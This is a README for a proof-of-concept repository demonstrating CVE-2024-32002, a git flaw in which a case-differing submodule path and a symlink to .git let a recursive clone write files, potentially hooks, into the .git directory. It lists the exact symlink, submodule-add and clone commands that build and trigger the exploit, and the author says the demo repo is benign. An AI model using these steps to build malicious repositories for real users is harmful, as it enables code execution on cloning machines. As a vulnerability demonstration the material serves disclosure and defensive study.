A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.
See cve-2024-32002-submodule-aw for the related submodule repository.
- A symlink with an arbitraty name that links to the
.gitdirectory. - A
.gitmodulesfile that defines the malicious submodule.
This repo was created in Linux (WSL2, to be specific). This is important, the malicious repo can only be created on a case-sensitive filesystem.
- Create a symlink, using all lowercase characters
ln -s .git submoduleNotes:
- The symlink should point to the .git folder, since this is where we want to write files
- The symlink name (submodule) is arbitrary, but should start with a lowercase character
- This is important, because lowercase characters sort earlier than uppercase characters. When the clonong machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.
- Add the malicious submodule, noting the case difference on the submodule directory name
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexistsNotes:
- The name of the submodule matters, it wil come into play when placing our hook in the submodule.
- The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
- There must be at least one other segment to the path, since git will only clone submodules into an emptry directory. It will create directories for us though, so we chose "notexists" to demonstrate that.
- Check whether you have a vulnerable version of git. See the GitHub advisory for affected versions.
git --version- Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
- Run the following command:
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git- Take a look in the .git directory. See anything out of place. Hint: What files are in the submodule.